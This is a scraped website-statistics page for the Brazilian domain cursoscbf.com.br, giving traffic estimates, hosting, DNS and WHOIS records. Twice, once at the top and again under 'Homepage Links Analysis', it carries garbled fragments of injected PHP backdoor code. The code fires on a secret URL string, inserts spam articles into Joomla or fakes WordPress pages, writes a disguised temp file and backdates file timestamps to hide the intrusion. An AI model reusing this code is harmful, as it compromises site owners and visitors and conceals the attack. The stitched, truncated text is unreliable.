id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } }"/>

[DESCRIPTION]

1.67 Rating by ClearWebStats
cursoscbf.com.br is 1 decade 10 months 3 weeks old. This website has a #6,502,404 rank in global traffic. It has a .com.br as an domain extension. This domain is estimated value of $ 8.95 and has a daily earning of $ 0.15. While no active threats were reported recently by users, cursoscbf.com.br is SAFE to browse.
Get Custom Widget

Traffic Report of Cursoscbf

Daily Unique Visitors: 74
Daily Pageviews: 148

Estimated Valuation

Income Per Day: $ 0.15
Estimated Worth: $ 8.95

Search Engine Indexes

Google Indexed Pages: Not Applicable
Yahoo Indexed Pages: Not Applicable
Bing Indexed Pages: Not Applicable

Search Engine Backlinks

Google Backlinks: Not Applicable
Bing Backlinks: Not Applicable
Alexa BackLinks: Not Applicable

Safety Information

Google Safe Browsing: No Risk Issues
Siteadvisor Rating: Not Applicable
WOT Trustworthiness: Not Applicable
WOT Privacy: Not Applicable
WOT Child Safety: Not Applicable

Website Ranks & Scores

Google Pagerank: Not Applicable
Alexa Rank: 6,502,404
Domain Authority: Not Applicable
Google Pagerank
PR 0 out of 10
PageSpeed Score
93
Siteadvisor Rating
View cursoscbf.com.br site advisor rating Not Applicable

Where is cursoscbf.com.br server located?

Hosted IP Address:

179.188.11.33 View other site hosted with cursoscbf.com.br

Hosted Country:

cursoscbf.com.br hosted country BR cursoscbf.com.br hosted country

Location Latitude:

-22.8305

Location Longitude:

-43.2192

Social Engagement

Facebook Shares: Not Applicable
Facebook Likes: Not Applicable
Facebook Comments: Not Applicable
Twitter Count (Tweets): Not Applicable
Linkedin Shares: Not Applicable
Delicious Shares: Not Applicable

Page Resources Breakdown

View cursoscbf.com.br HTML resources

Homepage Links Analysis

]*>[^#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#\[CONTENT\]#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } }

Website Inpage Analysis

H1 Headings: Not Applicable H2 Headings: Not Applicable
H3 Headings: Not Applicable H4 Headings: Not Applicable
H5 Headings: Not Applicable H6 Headings: Not Applicable
Total IFRAMEs: Not Applicable Total Images: Not Applicable
Google Adsense: Not Applicable Google Analytics: Not Applicable

Websites Hosted on Same IP (i.e. 179.188.11.33)

Cartone Design - Móveis de Papelão

cursoscbf.com.br favicon - cartonedesign.com.br

Cartone Design - Móveis de papelão. Cadeiras, mesas, bancos, estantes, racks, e muito mais. Temos opções personalizadas e atendemos eventos.

View cursoscbf.com.br Pagerank   cursoscbf.com.br alexa rank 1,558,966   cursoscbf.com.br website value $ 480.00

Ticket Fácil

cursoscbf.com.br favicon - ticketfacil.com.br

Venda de ingressos

View cursoscbf.com.br Pagerank   cursoscbf.com.br alexa rank 504,693   cursoscbf.com.br website value $ 1,440.00

Guaraves Alimentos - Guaraves Guarabira Aves Ltda.

cursoscbf.com.br favicon - guaraves.com.br

View cursoscbf.com.br Pagerank   cursoscbf.com.br alexa rank 1,125,707   cursoscbf.com.br website value $ 720.00

PCERJ

cursoscbf.com.br favicon - policiacivilrj.net.br

Portal da Polícia Civil do Estado do Rio de Janeiro. Notícias sobre operações policiais, institucionais e serviços ao cidadão.

View cursoscbf.com.br Pagerank   cursoscbf.com.br alexa rank 695,065   cursoscbf.com.br website value $ 960.00

Paróquia N. Sra. do Perpétuo Socorro

cursoscbf.com.br favicon - ppsocorro.com.br

View cursoscbf.com.br Pagerank   cursoscbf.com.br alexa rank 2,227,085   cursoscbf.com.br website value $ 240.00

HTTP Header Analysis

Http-Version: 1.1
Status-Code: 200
Status: 200 OK
Date: Fri, 30 Dec 2016 14:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 10633
Connection: close
Content-Type: text/html

Domain Information for cursoscbf.com.br

Domain Registrar: BR-NIC cursoscbf.com.br registrar info
Registration Date: 2013-06-06 1 decade 10 months 3 weeks ago
Last Modified: 2015-06-10 8 years 10 months 2 weeks ago
Expiration Date: 2017-06-06 6 years 10 months 3 weeks ago

Domain Nameserver Information

Host IP Address Country
ns1.locaweb.com.br cursoscbf.com.br name server information 186.202.8.254 cursoscbf.com.br server is located in Brazil Brazil
ns2.locaweb.com.br cursoscbf.com.br name server information 187.45.248.254 cursoscbf.com.br server is located in Brazil Brazil

DNS Record Analysis

Host Type TTL Extra
cursoscbf.com.br A 3600 IP:179.188.11.33
cursoscbf.com.br NS 3600 Target:ns3.locaweb.com.br
cursoscbf.com.br NS 3600 Target:ns1.locaweb.com.br
cursoscbf.com.br NS 3600 Target:ns2.locaweb.com.br
cursoscbf.com.br SOA 3600 MNAME:ns1.locaweb.com.br
RNAME:postmaster.locaweb.com.br
Serial:2013060601
Refresh:3600
Retry:600
Expire:1209600
cursoscbf.com.br MX 3600 Priority:10
Target:mx.a.locaweb.com.br
cursoscbf.com.br MX 3600 Priority:20
Target:mx.jk.locaweb.com.br
cursoscbf.com.br MX 3600 Priority:10
Target:mx.b.locaweb.com.br
cursoscbf.com.br TXT 3600 TXT:google-site-verification=Hgy2kfHSx13eRQi
N0Y1rWz8gyURBVkdAvvzUCdWV0rQ
cursoscbf.com.br TXT 3600 TXT:v=spf1 include:_spf.locaweb.com.br ?all

Similarly Ranked Websites to Cursoscbf

BIBLE ARCHITECTURE:HOUSING,JERUSALEM,MASADA,JERICHO,MEGIDDO,LACHISH,HERODIUM,MACHAERUS

cursoscbf.com.br favicon - bible-architecture.info

Bible Architecture for travel and Bible study groups:houses,palaces,fortification;Temple of Jerusalem,high places.Qumran,Lachish,Jerusalem,Jericho,Beersheba,Sepphoris,Herodium,Masada.

View cursoscbf.com.br Pagerank   Alexa rank for cursoscbf.com.br 6,502,412   website value of cursoscbf.com.br $ 8.95

Knysna Accommodation Bed and Breakfast Stannards Guest Lodge

cursoscbf.com.br favicon - stannards.co.za

Luxury Lodge in Knysna bed and breakfast accommodation Knysna Garden Route South Africa

View cursoscbf.com.br Pagerank   Alexa rank for cursoscbf.com.br 6,502,437   website value of cursoscbf.com.br $ 8.95

SwitchShop24

cursoscbf.com.br favicon - switchshop24.de

Sehr geehrte SwitchShop24-Kunden, wir haben unseren Online-Shop auf eine neue Softwareplattform umgestellt! Bei Fragen oder Bestellungen können Sie uns auch gern per eMail unter [email protected] oder telephonisch unter +49 (0)6028 / 948 26 50-0 kontaktieren. Leider konnten im Zuge dieser Umstellung bisherige Kunden-Logins nicht mit übernommen werden. Wir bitten um Ihr Verständnis. Ihr SwitchShop24-Team

View cursoscbf.com.br Pagerank   Alexa rank for cursoscbf.com.br 6,502,459   website value of cursoscbf.com.br $ 8.95

Skin Cancer and Reconstructive Surgery Center - Skin Cancer and Reconstructive Surgery Center

cursoscbf.com.br favicon - ocskincancer.com

Skin Cancer and Reconstructive Surgery Center offers a comprehensive array of innovative techniques for skin care and skin cancer treatments.

View cursoscbf.com.br Pagerank   Alexa rank for cursoscbf.com.br 6,502,472   website value of cursoscbf.com.br $ 8.95

SILICON LAPTOPS

cursoscbf.com.br favicon - secondhandlaptopshyderabad.com

View cursoscbf.com.br Pagerank   Alexa rank for cursoscbf.com.br 6,502,480   website value of cursoscbf.com.br $ 8.95

Full WHOIS Lookup for cursoscbf.com.br

% Copyright (c) Nic.br
% The use of the data below is only permitted as described in
% full by the terms of use at http://registro.br/termo/en.html ,
% being prohibited its distribution, commercialization or
% reproduction, in particular, to use it for advertising or
% any similar purpose.
% 2016-12-30 12:41:54 (BRST -02:00)

domain: cursoscbf.com.br
owner: Alberto Belotti
owner-c: ALBEL35
admin-c: ALBEL35
tech-c: ESS33
billing-c: ESS33
nserver: ns1.locaweb.com.br
nsstat: 20161230 AA
nslastaa: 20161230
nserver: ns2.locaweb.com.br
nsstat: 20161230 AA
nslastaa: 20161230
saci: yes
created: 20130606 #11550977
changed: 20150610
expires: 20170606
status: published

nic-hdl-br: ALBEL35
person: Alberto Belotti
created: 20110602
changed: 20120710

nic-hdl-br: ESS33
person: Estevao Santos Severino
created: 19990113
changed: 20120306

% Security and mail abuse issues should also be addressed to
% cert.br, http://www.cert.br/ , respectivelly to [email protected]
% and [email protected]
%
% whois.registro.br accepts only direct match queries. Types
% of queries are: domain (.br), registrant (tax ID), ticket,
% provider, contact handle (ID), CIDR block, IP and ASN.